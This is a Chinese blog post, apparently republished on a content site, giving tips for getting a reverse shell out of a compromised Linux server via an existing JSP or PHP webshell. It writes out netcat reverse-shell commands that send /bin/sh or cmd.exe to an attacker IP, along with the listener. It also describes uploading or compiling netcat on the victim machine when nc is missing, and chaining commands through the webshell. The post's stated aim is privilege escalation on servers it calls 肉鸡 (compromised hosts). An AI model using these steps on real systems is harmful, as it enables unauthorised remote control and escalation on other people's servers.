共计 1493 个字符,预计需要花费 4 分钟才能阅读完成。
这篇文章主要为大家展示了“Linux 下反弹 CmdLine Shell 小技巧有哪些”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让丸趣 TV 小编带领大家一起研究并学习一下“Linux 下反弹 CmdLine Shell 小技巧有哪些”这篇文章吧。
Linux 提权绝大部分都靠的是 Local Exploit。WebShell 一般都可以执行命令,但是我们的 EXP 必须在可交互环境运行,否则如果直接在 WebShell 执行,即使能提权成功,我们也没法利用到。所以我们需要先反弹一个 CmdLine Shell 回来 (直接说成 CmdShell 怕人误解 … 因为 Win 有个 cmd.exe ^_^),然后在命令行终端下执行 EXP 进行提权。
一般情况下,绝大多数人都会通过 PHP WebShell 的 Back Connect 功能弹回一个 Shell,但是有时候会碰到服务器不支持 PHP 或者 WebShell 没法反弹的情况,比如这两天朋友给我的一个 JSPShell 所在服务器只支持 JSP,不支持 PHP。这时候,我们经典的 netcat 就可以派上用场了。
平时在 Windows 下做事的时候,在必要的情况下我们可以先在本机运行 nc -vv -lp 1234 监听端口,然后在肉鸡上 nc 12.21.12.21 1234 -e cmd.exe 给我们反弹一个 CmdShell,这个方法在 Linux 仍然可行。
在本机监听后,在 WebShell 运行 nc 12.21.12.21 1234 -e /bin/sh 就能弹一个 CmdLine Shell 给我们。
但我们经常碰到的情况并不都是这么 100% 顺利的,像昨晚整的那两台,每台都是不能直接执行 nc 的。一台有 nc,但执行从是不起作用,另外一台直接压根就没有 nc….
不过,这个难不倒我们,我们可以给他装一个嘛,比较快捷的方法是,我们可以到 http://netcat.sourceforge.net/download.php 下载 nc 的源码,先在我们自己 linux 机器上编译好以后把 bin 文件传上去 (我开始传的我的 Debian 自带的 netcat,结果仍然不能运行 ….)。如果还不行,那就把源码传上去,在目标机器上直接编译。
昨晚那两台机器,一台我是直接传的本地编译后的,一台是在目标机器上编译的。如果直接传的 nc 可以运行的话还比较好说,如果需要在目标机器上编译的话,这里有点小技巧:
因为在得到 CmdLine Shell 前,我们只能在 WebShell 里执行命令,一般每次只能执行一条,然后等回显。假如我们的 WebShell 在 /var/www/site 目录,那么我们每次执行命令默认的当前路径都是 /var/www/site,而我们的 netcat 源码包解压在了 /tmp/netcatsrc 文件夹,这样的话,我们编译 netcat 的时候,configure 还好说,可用 /tmp/netcatsrc/configure 命令,但下一步 make 的时候就不行了,因为当前路径是 /var/www/site,而不是我们想要的 /tmp/netcatsrc/,所以我们 configure 完了 make 的时候会报错。
解决这个问题其实也很简单,可以直接把两句写成一句就可以:cd /tmp/netcatsrc;make
用分号隔开写,把 make 跟在目录切换命令后面,这样编译的时候就不会报错了。
在还没有得到 CmdLine Shell 的时候,这样的写法还是很有用的。
以上是“Linux 下反弹 CmdLine Shell 小技巧有哪些”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注丸趣 TV 行业资讯频道!